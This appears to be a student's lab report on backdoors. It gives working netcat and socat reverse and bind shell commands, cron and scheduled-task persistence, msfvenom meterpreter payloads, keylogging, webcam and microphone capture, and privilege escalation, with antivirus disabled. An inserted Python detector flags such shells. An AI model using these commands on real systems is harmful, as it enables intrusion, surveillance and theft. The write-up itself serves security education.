20175236 Exp2 Backdoor Principles and Practice, 2019-2020-2 Network Countermeasures Technology

Table of Contents


I. Experiment content and basic questions
II. Tool preparation

  • View the Windows IP and Linux IP
  • Windows gets a Linux shell
  • Linux gets a Windows shell
  • Transferring data with nc

III. Experiment process

  • Use netcat to get a shell on the host, started by cron
  • Use socat to get a shell on the host, started by a scheduled task
  • Use MSF meterpreter (or other software) to generate an executable, transfer it to the host with ncat or socat, run it and get a shell on the host
  • Use MSF meterpreter (or other software) to generate a backdoor that captures audio, camera, keystrokes, etc. from the target host, and try privilege escalation
  • Bonus: use MSF to generate shellcode, inject it into the pwn1 from Exp1, and get a reverse shell

IV. Problems and reflections

I. Experiment content and basic questions


1. Experiment content
(1) Use netcat to get a shell on the host, started by cron (0.5 points)

(2) Use socat to get a shell on the host, started by a scheduled task (0.5 points)

(3) Use MSF meterpreter (or other software) to generate an executable, transfer it to the host with ncat or socat, run it and get a shell on the host (0.5 points)

(4) Use MSF meterpreter (or other software) to generate a backdoor that captures audio, camera, keystrokes, etc. from the target host, and try privilege escalation (2 points)

(5) Bonus: use MSF to generate shellcode, inject it into the pwn1 from Exp1, and get a reverse shell (1 point). Write the report together with the rest of this experiment.

2. Basic questions
(1) What possible ways can you think of for a backdoor to get into your system?

  • Cracking the password of a Linux account
  • Replacing the login program with one that accepts a special hidden password
  • Hiding a backdoor in the file system

(2) What startup methods (on Windows and Linux) do you know that a backdoor could use? Give examples.

  • Linux: use crontab to start the Trojan on a timer, so the controlling side can keep monitoring its status and the backdoor is started periodically; the backdoor can also be bound to a normal program by injecting shellcode into it, which then opens the backdoor.
  • Windows: the victim passively receives or downloads the backdoor; when the victim clicks and runs it, the backdoor program starts.

(3) Which Meterpreter functions left the deepest impression on you?

  • Basic functions (basic connection, executing commands)
  • Extended functions (such as collecting user information, installing services, etc.)

(4) How do you find out whether a backdoor has been installed on your system?

  • Install antivirus software for real-time protection.
  • Check network connections: look for IPs that have established connections with the machine.

(5) The backdoor concept

A backdoor is a way into a system that bypasses the normal authentication process and channels.

Where do backdoors come from?

  • The compiler leaves a backdoor
  • The operating system leaves a backdoor
  • Most commonly, of course, an application leaves a backdoor
  • There are also dedicated backdoor programs lurking in the operating system or disguised as a specific application.

Here are some examples from recent years:

  1. Compiler: the Apple Xcode backdoor incident. Apps caught by the Xcode backdoor include WeChat, NetEase Cloud Music, Didi Chuxing, 12306 and others, 76 pieces of software in total, affecting hundreds of millions of users.
  2. Operating system: vendors vs. governments. Apple refused the FBI's demand to build in a backdoor. Those who did not refuse, of course, cannot be talked about.
  3. Operating system: an in-depth reading of the MS14-068 vulnerability: a backdoor planted by Microsoft? Actually I did not understand the details very well either; it just looks quite suspicious.
  4. Firmware: more Cisco routers found with backdoors, four of them in China
  5. Application: researchers found a built-in backdoor in the macOS version of Skype
  6. Application: looking at the bottom line of corporate ethics from the Gustafsson "backdoor" incident
  7. Application: how to evaluate the WormHole backdoor vulnerability that the WooYun platform exposed in a variety of Baidu apps?

A somewhat narrower backdoor concept:

  • Specifically, a program lurking in the operating system whose purpose is to be a backdoor
  • The "bad guys" can connect to this program
  • And execute various commands remotely
  • The concept overlaps with Trojans
  • First of all, there has to be such a program
    • the netcat family
    • meterpreter
    • intersect
    • special-purpose ones ...
  • Second, it has to get into the system
    • Genuine software that contains a backdoor, deliberately or because it was attacked
    • A genuine library file that contains a backdoor
    • Essentially, tricking you into downloading and running it; all kinds of phishing
      • An installation package containing the backdoor, put online for download
      • Bound to a specific file and put online for download
      • A malicious program sent directly to you
      • A phishing link sent directly to you, pointing at a malicious website that drops a Trojan
      • Picked up a USB stick and opened a file to have a look?
    • A pretty girl or handsome guy brings a USB stick over and copies it straight onto your machine
    • Attack a system vulnerability, and after gaining control, install the backdoor
  • Then it has to start and keep running
    • Auto-start at boot
    • Windows scheduled tasks
    • Linux cron
    • Disguised as common software, enticing the user to click
    • Trojanized normal software
  • Finally, it must not be found by the malicious code detection programs on the machine
    • Malicious code anti-detection (AV evasion) techniques
  • And it must not be found by the firewall on the machine or the network
    • Reverse connection
    • Encrypted connection
    • Tunneling

(6) Common backdoors

  • netcat

    It is a low-level tool for basic TCP/UDP sending and receiving. It is often used in combination with other tools, playing the role of a backdoor.

    • Linux: usually comes with netcat; see "man netcat" or "man nc" for its usage
    • Windows: download ncat.rar from the course homepage attachments; extract it and it can be used!

II. Tool preparation


1 Use netcat (nc) to get a remote host shell

1.1 Windows gets a Linux shell

1. Windows starts listening

  • Check the local IP with the ipconfig command: 192.168.157.1

  • Download ncat and enter its directory, press Windows+R to open cmd.exe, and enter the command ncat.exe -l -p 5236:

  • Then Windows Firewall raises an alarm! To achieve the purpose of the experiment, the antivirus software and Windows Firewall on this computer are temporarily turned off here:

2. Linux connects back to Windows; enter the command nc 192.168.157.1 5236 -e /bin/sh:

3. Windows gets the Linux shell and can run any command, such as ls:

1.2 Linux gets a Windows shell

1. Check the local IP with the ifconfig command: 192.168.157.132

2. Linux runs the listening command: enter nc -l -p 5236

3. Windows connects back to Linux; in the ncat directory enter the command ncat.exe -e cmd.exe 192.168.157.132 5236:

4. Linux sees the Windows command prompt

5. Now you can view and manipulate files on Windows at will, ha ha ha!

2 Transferring data with nc

  • The command format for transferring a file with nc is as follows:

    The destination host listens:

    nc -l <listening port> > <file name to receive>

    The source host initiates the request:

    nc <destination host IP> <destination port> < <file to send>

  • The English manual describes it as follows:

    Start by using nc to listen on a specific port, with output captured into a file:

    $ nc -l 1234 > filename.out

    Using a second machine, connect to the listening nc process, feeding it the file which is to be transferred:

    $ nc host.example.com 1234 < filename.in

    After the file has been transferred, the connection will close automatically.

  • Windows listens on port 5224

  • Kali connects to port 5224 on Windows

  • The data transfer connection is established

III. Experiment process

Use netcat to get a shell on the host, started by cron

    • Windows listens on port 5236

    • In Kali, edit the scheduled tasks with crontab -e and choose editor 3

    • Add the line 24 * * * * /bin/netcat 192.168.157.1 5236 -e /bin/sh at the end, which means: at minute 24 of every hour, connect back to port 5236 on the Windows host

    • When the time reaches 22:24, the Kali shell has been obtained in Windows and commands can be entered

Use socat to get a shell on the host, started by a scheduled task

       Shocking!

Netcat++, the super netcat tool.

Don't believe it? Look at the README.

For the Windows version, see the attachment. Extract and use it; no installation needed.

Any proxying, forwarding and other functions can be implemented with this tool.

  • Use the man socat command to view the socat description and related usage:

    DESCRIPTION

     Socat is a command line based utility that establishes two bidirectional byte streams and transfers data between them. Because the streams can be constructed from a large set of different types of data sinks and sources (see address types), and because lots of address options may be applied to the streams, socat can be used for many different purposes.

     Filan is a utility that prints information about its active file descriptors to stdout. It has been written for debugging socat, but might be useful for other purposes too. Use the -h option to find more infos.

     Procan is a utility that prints information about process parameters to stdout. It has been written to better understand some UNIX process properties and for debugging socat, but might be useful for other purposes too.

     The life cycle of a socat instance typically consists of four phases.

     In the init phase, the command line options are parsed and logging is initialized.

     During the open phase, socat opens the first address and afterwards the second address. These steps are usually blocking; thus, especially for complex address types like socks, connection requests or authentication dialogs must be completed before the next step is started.

     In the transfer phase, socat watches both streams' read and write file descriptors via select(), and, when data is available on one side and can be written to the other side, socat reads it, performs newline character conversions if required, and writes the data to the write file descriptor of the other stream, then continues waiting for more data in both directions.

     When one of the streams effectively reaches EOF, the closing phase begins. Socat transfers the EOF condition to the other stream, i.e. tries to shutdown only its write stream, giving it a chance to terminate gracefully. For a defined time socat continues to transfer data in the other direction, but then closes all remaining channels and terminates.
    • In Windows 10, right-click the Windows icon at the bottom left of the screen and select "Computer Management" (or simply search for "Computer Management")
    • Create a task in Task Scheduler and fill in the task name (school)

    • Click the Triggers (触发器) tab, select New (新建), and set the task to begin "On workstation lock" (工作站锁定时):
    • Click the Actions (操作) tab, click New (新建), under Program/script select the path of socat.exe, and in the arguments field enter tcp-listen:5236 exec:cmd.exe,pty,stderr (this binds cmd.exe to port 5236 and redirects cmd.exe's stderr to stdout); click OK (确定) to save the settings:

    • Once created, the task shows as ready. Press Windows+L to lock the computer; after unlocking, find the task you created and double-click it, and you can see that the task has started running

    • Now, in the Kali environment, enter the command socat - tcp:192.168.157.1:5236. The first argument - stands for standard input/output, and the second is a TCP stream to port 5236 on the Windows host. At this point a cmd shell has been obtained successfully
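As an added example that is not from the original report, a Python auditor for the two persistence entries above: it parses crontab lines like the 24 * * * * /bin/netcat ... -e /bin/sh entry and socat argument strings like tcp-listen:5236 exec:cmd.exe,pty,stderr (the same string a scheduled task would carry), and reports which ones bind a shell to a socket or connect a shell back out. The crontab sample is constructed; the shell and tool name sets are assumptions.

```python
import shlex

RELAY_NC = {"nc", "netcat", "ncat"}
SHELLS = {"sh", "bash", "dash", "zsh", "cmd", "powershell"}  # assumption: extend for your environment

def base(path: str) -> str:
    """Lower-cased basename of a POSIX or Windows path, without a trailing .exe."""
    name = path.replace("\\", "/").rsplit("/", 1)[-1].lower()
    return name[:-4] if name.endswith(".exe") else name

def parse_socat_address(addr: str) -> tuple:
    """Split 'exec:cmd.exe,pty,stderr' into ('exec', 'cmd.exe', ['pty', 'stderr'])."""
    head, _, opts = addr.partition(",")
    atype, _, target = head.partition(":")
    return atype.lower(), target, opts.split(",") if opts else []

def audit_command(argv: list):
    """Explain why argv looks like a bind or reverse shell, or return None."""
    tool = base(argv[0]) if argv else ""
    if tool in RELAY_NC:
        # -e/-c hand the connection to a program; a shell there is a remote shell
        for i in range(1, len(argv) - 1):
            if argv[i] in ("-e", "-c") and base(argv[i + 1]) in SHELLS:
                mode = "bind" if "-l" in argv else "reverse"
                return f"{tool} {mode} shell: executes {argv[i + 1]}"
    if tool == "socat":
        addrs = [parse_socat_address(a) for a in argv[1:] if ":" in a]
        listens = any(t.endswith(("-listen", "-l")) for t, _, _ in addrs)
        execs = [tgt for t, tgt, _ in addrs
                 if t in ("exec", "system") and base((tgt.split() or [""])[0]) in SHELLS]
        if execs:
            return f"socat {'bind' if listens else 'reverse'} shell: executes {execs[0]}"
    return None

def audit_crontab(text: str) -> list:
    """Flag crontab entries whose command audit_command() considers a remote shell."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        s = line.strip()
        if not s or s.startswith("#") or "=" in s.split()[0]:
            continue  # blank line, comment, or VAR=value assignment
        fields = s.split(None, 5)  # five schedule fields, then the command
        if len(fields) < 6:
            continue
        reason = audit_command(shlex.split(fields[5]))
        if reason:
            findings.append({"line": lineno, "schedule": " ".join(fields[:5]), "reason": reason})
    return findings

# Constructed sample crontab modelled on the lab's entry; not from a real host.
SAMPLE_CRONTAB = """\
0 3 * * * /usr/bin/apt-get update
24 * * * * /bin/netcat 192.168.157.1 5236 -e /bin/sh
*/5 * * * * /usr/bin/socat tcp:192.168.157.1:5236 exec:/bin/bash,pty,stderr
"""
```

Feed audit_crontab() the output of crontab -l for each user, and audit_command() the argument list of any scheduled task or service whose program is nc, ncat or socat.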

Use MSF meterpreter to generate an executable, transfer it to the host with ncat or socat, run it and get a shell on the host

      Meterpreter

  • It is a backdoor program.
  • The traditional understanding is: someone writes a backdoor, and we make use of it.
  • Later some experts wanted to write a platform that generates backdoors. With such a platform, the backdoor's
    • basic functions (basic connection, executing commands)
    • extended functions (such as collecting user information, installing services, etc.)
    • encoding mode
    • target platform
    • and run parameters
  • are partly or entirely made into adjustable parameters. Combining them as needed generates an executable file.

A typical platform will include:

Next we learn how to use msfvenom to generate a backdoor executable. The backdoor we want to generate is Meterpreter.

"Meterpreter: uncovering the mystery" describes some of the underlying principles of Meterpreter ???.

  • Enter the command msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.182.128 LPORT=5224 -f exe > 20175224_backdoor.exe to generate the backdoor

Note: the IP address is the Linux IP.

Parameter description:

-p: the payload to use. "Payload" means the thing to be delivered; here windows/meterpreter/reverse_tcp is a piece of shellcode

-x: the executable template to use; the payload (shellcode) is written into this executable

-e: the encoder to use, which transforms the shellcode in order to evade antivirus

-i: number of encoder iterations, e.g. encode 5 times with the encoder

-b: bad characters to be removed from the payload

LHOST: the IP to connect back to

LPORT: the port to connect back to

-f: the format of the generated file

>: the file to write the output to

Of course, the generated file has to be copied to Windows with ncat (most likely the antivirus software will raise an alarm and delete the file, because it is, after all, a backdoor; so to verify this feature you can temporarily turn the antivirus off for a while. AV evasion will be covered later: once the backdoor has been made evasive, the antivirus software will not find it).

  • Next, on Windows enter receiving mode: ncat.exe -lv 5236 > 20175236_backdoor.exe
  • On Linux execute nc 192.168.157.1 5236 < 20175236_backdoor.exe (note: turn off the antivirus software)

    The IP address here is the Windows IP

  • The file is sent and received successfully

  • Open a terminal in Kali and enter msfconsole to enter the msf console

  • Enter use exploit/multi/handler to enter the listener module

  • Enter set payload windows/meterpreter/reverse_tcp to set the payload

  • Enter set LHOST 192.168.182.128 and then set LPORT 5224 to set the IP and port

    Note that the IP specified here is the Linux IP, the same IP used when generating the backdoor

    • Setup is complete; enter exploit to start listening

    • Run the backdoor on Windows

    • Kali receives the connection from the Windows host, and a shell for remote control is obtained

Notes:

  1. LHOST must match the one used in the step that generated backdoor.exe, i.e. 192.168.157.132 in this example;
  2. LPORT must also match the previous step that generated backdoor.exe, i.e. 5236;
  3. The payload must match too, i.e. windows/meterpreter/reverse_tcp.

Use MSF meterpreter to capture audio, camera and keystrokes from the target host

    • The record_mic command captures audio

    • The webcam_snap command takes a picture with the camera (I am ugly, and I had not put a sticker over the lens)

    • The screenshot command takes a screenshot (I forgot to screenshot typing the command, but the generated screenshot file can be seen)

    • The keyscan_start command starts recording keystrokes, and the keyscan_dump command reads the recorded keystrokes

    • First use the getuid command to view the current user, then use the getsystem command to escalate privileges

Bonus: use MSF to generate shellcode, inject it into the pwn1 from Exp1, and get a reverse shell

  • Use the command msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.157.132 LPORT=5236 -x /root/Desktop/20175224/exp2/pwn1 -f elf > 5236pwn to generate the shellcode file 5236pwn in ELF format, using pwn1 as the template

  • Enter the command msfconsole to enter the msf command line
  • Run the backdoor file 5236pwn on Kali; before running pwn2 in Kali, add execute permission first: chmod +x 5236pwn
  • At this point the attacking Linux has obtained the connection from the attacked Linux and gets a shell for remote control


IV. Problems and reflections

       I feel this experiment was not particularly difficult; compared with the first experiment I was much more familiar with the environment, so it was also relatively easy to do. It is just that I have had many learning tasks recently and they were a bit messy, so my time allocation was irrational and the quality of the test report is not high. But in general this experiment can be summed up in four words: really fun! I felt that establishing a backdoor connection is so simple, yet its functions are so powerful; the experiment process was still quite rewarding. Of course, I also learned some other things from CSDN, for example that Meterpreter has much more than the single thing I thought of; referring to someone else's blog on CSDN I learned some other Meterpreter-related knowledge:

Use the help command to view Meterpreter's basic functions:

Get a Windows command line interface, convenient for executing built-in Windows commands; exit to quit. Get a Ruby interface; exit to quit. If you are good enough, you can even program directly in Ruby (PS: I can't, so I won't say more)

It is said that any Windows API can be called. See Chapter 9 of "Metasploit Devil Training Camp", which has a small example.

       There are many things to learn; "no matter in security is small"! Through this hands-on experiment I gained a deeper understanding of how weak some systems are at preventing intrusion; it is shocking that such a simple backdoor works, which indirectly raised my security awareness.

Origin www.cnblogs.com/wff666999/p/12549778.html